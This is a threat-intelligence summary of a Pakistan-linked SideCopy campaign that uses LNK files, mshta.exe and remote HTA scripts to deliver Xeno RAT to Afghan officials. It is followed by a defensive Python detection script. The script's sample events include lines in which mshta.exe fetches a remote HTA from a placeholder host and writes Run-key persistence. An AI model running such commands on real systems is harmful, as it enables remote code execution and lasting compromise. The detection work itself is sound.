Summary Points
- The Pakistan-linked SideCopy group is conducting sophisticated spear-phishing campaigns targeting Afghan government officials using Pashto-language lures and weaponized ZIP and LNK files to deploy Xeno RAT and other malware, facilitating data theft and persistence.
- The campaign uses mshta.exe to load remote HTML Application (HTA) files that deliver obfuscated JavaScript, establishing Registry-based persistence and enabling remote command execution, keystroke logging, and surveillance.
- Additionally, a separate targeted operation leverages weaponized Linux .desktop files to infect Indian military infrastructure, using staged shell payloads and Golang-based implants to compromise defense networks.
Threat, Attack Techniques, and Targets
Cybersecurity researchers have uncovered a campaign by the Pakistan-aligned group SideCopy. This group appears to be targeting Afghanistan’s Ministry of Finance. They use spear-phishing emails to deliver malicious files. These files are ZIP archives containing specially crafted LNK files with Pashto-language filenames. The attackers use Pashto because it is the main language spoken in Afghan government circles.
Once a target opens the LNK file, it uses “mshta.exe” to load a remote HTML Application (HTA). In the background, this HTA runs obfuscated JavaScript code, which drops the malware. The malware includes Xeno RAT, a remote access tool that allows attackers to control the infected device. Beyond the Ministry of Finance, the campaign also targets provincial revenue and finance officials, government employees, and other provincial-level officials in Afghanistan.
SideCopy operates under the umbrella of Transparent Tribe, also tracked as APT36. This group has previously used malware such as Xeno RAT, Spark RAT, and CurlBack RAT in other South Asian attacks, and it appears to be continuing this pattern of targeting South Asian entities with a rotating set of malicious tools.
Impact, Security Implications, and Remediation Guidance
The attacks can lead to serious security issues. Once infected, the malware can steal sensitive data, monitor activities, take screenshots, and access device cameras and microphones. The attackers can also establish persistent access. This situation could compromise the Afghan government’s financial operations and other sensitive information.
Organizations need to be aware of these attack methods. It is essential to verify email attachments carefully, especially ZIP files with LNK shortcuts. Security teams should also monitor for unusual activity on devices, such as new scheduled tasks or suspicious registry changes.
Because of the technical complexity, a detailed remediation plan should be obtained from the relevant security vendor or authority. Organizations should apply patches, update antivirus software, and employ intrusion detection systems. If infected, immediate isolation and investigation are crucial to contain the threat.
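The monitoring advice above (ZIP attachments carrying LNK shortcuts, mshta.exe loading a remote HTA, and new Registry-based persistence) can be turned into simple detection logic. The following script is an added illustration, not code from the original report or from any vendor; it runs three rules over constructed, Sysmon-style process-creation and registry events (field names are simplified, hostnames and paths are placeholders) and also lists .lnk entries inside an attachment before anyone opens it.

```python
import io
import re
import zipfile
from dataclasses import dataclass

# Constructed telemetry modelled loosely on Sysmon Event ID 1 (process
# creation) and Event ID 13 (registry value set). Field names are
# simplified for this example; real Sysmon output differs.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe",
     "command_line": r"C:\Windows\explorer.exe"},
    # LNK-style launch: mshta.exe pulling an HTA from a remote URL (placeholder host)
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta.exe https://hta-host.invalid/update.hta"},
    # Local HTA used by an installer: must not trigger the remote-HTA rule
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Vendor\app.exe",
     "command_line": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    # Dropped payload started as a child of mshta.exe (constructed name)
    {"id": 1, "image": r"C:\Users\u\AppData\Roaming\svchost32.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"C:\Users\u\AppData\Roaming\svchost32.exe"},
    # Run-key persistence written by mshta.exe
    {"id": 13, "image": r"C:\Windows\System32\mshta.exe",
     "target_object": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": "mshta.exe https://hta-host.invalid/persist.hta"},
    # Ordinary application state write outside the Run keys
    {"id": 13, "image": r"C:\Program Files\Vendor\app.exe",
     "target_object": r"HKLM\SOFTWARE\Vendor\Settings\LastRun",
     "details": "2024-01-01"},
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\(?:Run|RunOnce)\\", re.IGNORECASE)
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe")


@dataclass
class Alert:
    rule: str
    severity: str
    evidence: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_remote_hta(event: dict):
    """mshta.exe fetching an HTA over the network, as in the LNK stage."""
    if event.get("id") != 1 or _basename(event["image"]) != "mshta.exe":
        return None
    cmd = event.get("command_line", "")
    if not REMOTE_URL.search(cmd):
        return None
    return Alert("mshta_remote_hta", "high", cmd)


def detect_mshta_child(event: dict):
    """A process started by mshta.exe: the HTA's script dropping and running something."""
    if event.get("id") != 1 or _basename(event.get("parent_image", "")) != "mshta.exe":
        return None
    return Alert("mshta_child_process", "medium", event["image"])


def detect_run_key_persistence(event: dict):
    """Run/RunOnce value written; rated high when the value invokes a script host."""
    if event.get("id") != 13 or not RUN_KEY.search(event.get("target_object", "")):
        return None
    details = event.get("details", "")
    severity = "high" if any(h in details.lower() for h in SCRIPT_HOSTS) else "medium"
    return Alert("run_key_persistence", severity, f'{event["target_object"]} = {details}')


RULES = (detect_remote_hta, detect_mshta_child, detect_run_key_persistence)


def scan(events):
    """Run every rule over every event; return alerts in event order."""
    alerts = []
    for event in events:
        for rule in RULES:
            alert = rule(event)
            if alert is not None:
                alerts.append(alert)
    return alerts


def shortcut_entries(zip_bytes: bytes):
    """Names of .lnk entries inside a ZIP attachment, found without extracting it."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith(".lnk")]


def _build_sample_zip() -> bytes:
    """Constructed attachment: a shortcut disguised with a document-like name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("budget_report.pdf.lnk", b"placeholder, not a real shortcut")
        zf.writestr("readme.txt", b"constructed sample")
    return buf.getvalue()


SAMPLE_ZIP = _build_sample_zip()

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.rule}: {a.evidence}")
    print("shortcut entries in attachment:", shortcut_entries(SAMPLE_ZIP))
```

On the constructed events the script raises three alerts (the remote HTA load, the child process of mshta.exe, and the Run-key write) while leaving the local installer HTA and the vendor registry write alone. In production the same rules would be fed from a SIEM or EDR export rather than an inline list, and the Run-key rule would normally be paired with the scheduled-task monitoring mentioned above.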
